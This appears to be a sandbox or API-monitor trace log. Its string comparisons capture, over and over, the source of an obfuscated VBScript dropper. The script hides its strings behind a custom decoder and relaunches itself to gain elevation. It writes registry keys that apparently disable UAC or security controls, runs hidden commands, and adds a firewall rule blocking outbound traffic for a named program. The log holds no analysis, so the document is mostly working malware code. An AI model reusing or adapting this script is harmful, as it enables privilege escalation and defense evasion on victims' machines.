bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.969] wcsncmp (_String1="(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.969] wcsncmp (_String1="s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.969] wcsncmp (_String1="1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.969] wcsncmp (_String1=",3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.969] wcsncmp (_String1="3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst 